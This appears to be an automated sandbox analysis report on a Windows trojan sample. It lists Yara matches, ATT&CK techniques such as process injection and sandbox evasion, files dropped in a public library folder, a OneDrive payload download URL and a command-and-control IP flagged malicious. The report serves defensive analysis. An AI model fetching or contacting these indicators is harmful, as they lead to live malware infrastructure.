              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: Yara matchFile source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2200611596.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000001.2234454714.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000001.2149766444.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              1
              Valid Accounts
              1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              111
              Input Capture
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default Accounts1
              Scripting
              1
              Valid Accounts
              1
              Valid Accounts
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              System Network Connections Discovery
              Remote Desktop Protocol1
              Screen Capture
              Exfiltration Over Bluetooth11
              Encrypted Channel
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain Accounts2
              Native API
              1
              Windows Service
              1
              Access Token Manipulation
              1
              Scripting
              Security Account Manager1
              File and Directory Discovery
              SMB/Windows Admin Shares111
              Input Capture
              Automated Exfiltration1
              Non-Standard Port
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local Accounts1
              Shared Modules
              1
              Scheduled Task/Job
              1
              Windows Service
              121
              Obfuscated Files or Information
              NTDS36
              System Information Discovery
              Distributed Component Object ModelInput CaptureTraffic Duplication2
              Non-Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              312
              Process Injection
              3
              Software Packing
              LSA Secrets1
              Query Registry
              SSHKeyloggingScheduled Transfer13
              Application Layer Protocol
              Data Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable Media1
              Scheduled Task/Job
              RC Scripts1
              Scheduled Task/Job
              1
              Timestomp
              Cached Domain Credentials261
              Security Software Discovery
              VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup Items1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              DCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Masquerading
              Proc Filesystem2
              Process Discovery
              Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Valid Accounts
              /etc/passwd and /etc/shadow11
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
              Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Virtualization/Sandbox Evasion
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
              Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
              Process Injection
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379527 Sample: PCMNil7wkU.exe Startdate: 23/01/2024 Architecture: WINDOWS Score: 100 39 ypeqqw.sn.files.1drv.com 2->39 41 web.fe.1drv.com 2->41 43 4 other IPs or domains 2->43 53 Snort IDS alert for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 10 other signatures 2->59 8 PCMNil7wkU.exe 1 9 2->8         started        13 Akaelkov.PIF 2->13         started        15 Akaelkov.PIF 2->15         started        signatures3 process4 dnsIp5 45 dual-spov-0006.spov-dc-msedge.net 150.171.43.11, 443, 49704, 49705 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->45 29 C:\Users\Public\Libraries\vokleakA.pif, PE32 8->29 dropped 31 C:\Users\Public\Libraries\truesight.sys, PE32+ 8->31 dropped 33 C:\Users\Public\Libraries\netutils.dll, PE32+ 8->33 dropped 35 2 other malicious files 8->35 dropped 61 Drops PE files with a suspicious file extension 8->61 63 Writes to foreign memory regions 8->63 65 Allocates memory in foreign processes 8->65 67 Sample is not signed and drops a device driver 8->67 17 vokleakA.pif 2 8->17         started        21 cmd.exe 1 8->21         started        69 Multi AV Scanner detection for dropped file 13->69 71 Sample uses process hollowing technique 13->71 23 vokleakA.pif 3 13->23         started        25 vokleakA.pif 15->25         started        file6 signatures7 process8 dnsIp9 37 139.84.229.159, 2017, 49707 LASALLEUS United States 17->37 47 Detected unpacking (changes PE section rights) 17->47 49 Detected unpacking (overwrites its own PE header) 17->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->51 27 conhost.exe 21->27         started        signatures10 process11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PCMNil7wkU.exe26%ReversingLabsWin32.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\netutils.dll100%Joe Sandbox ML
              C:\Users\Public\Libraries\Akaelkov.PIF26%ReversingLabsWin32.Trojan.Generic
              C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
              C:\Users\Public\Libraries\netutils.dll65%ReversingLabsWin64.Trojan.Generic
              C:\Users\Public\Libraries\truesight.sys8%ReversingLabs
              C:\Users\Public\Libraries\vokleakA.pif4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
              http://www.microsoft.0%URL Reputationsafe
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
              http://www.pmail.com00%Avira URL Cloudsafe
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              http://crl.verisign.0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              dual-spov-0006.spov-dc-msedge.net
              150.171.43.11
              truefalse
                unknown
                onedrive.live.com
                unknown
                unknownfalse
                  high
                  ypeqqw.sn.files.1drv.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://ypeqqw.sn.files.1drv.com:443/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfPCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://sectigo.com/CPS0PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://account.dyn.com/vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                          • URL Reputation: safe
                          unknown
                          http://ocsp.sectigo.com0PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                          • URL Reputation: safe
                          unknown
                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                          • URL Reputation: safe
                          unknown
                          http://www.microsoft.Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0d(Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://onedrive.live.com/PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://ypeqqw.sn.files.1drv.com:443/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fIAkaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWBPCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://ypeqqw.sn.files.1drv.com/PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://live.com/PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ypeqqw.sn.files.1drv.com/y4m_0zffjQKuzcWV-4RzvUr745PZwF21rnv86bmrYUTERnhgMrc3IjhKSzlEeoFvlewAkaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://live.com/#Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ypeqqw.sn.files.1drv.com:443/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAkaelkov.PIF, 00000008.00000002.2236274248.000000000093E000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://onedrive.live.com/c#Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000905000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.verisign.PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://live.com/&Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevokleakA.pif, 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQAAkaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000942000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.sectigo.com0CPCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=Akaelkov.PIF, 00000008.00000002.2247159296.0000000017CB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.pmail.com0PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        150.171.43.11
                                                        dual-spov-0006.spov-dc-msedge.netUnited States
                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        139.84.229.159
                                                        unknownUnited States
                                                        16498LASALLEUStrue
                                                        Joe Sandbox version:38.0.0 Ammolite
                                                        Analysis ID:1379527
                                                        Start date and time:2024-01-23 14:32:07 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
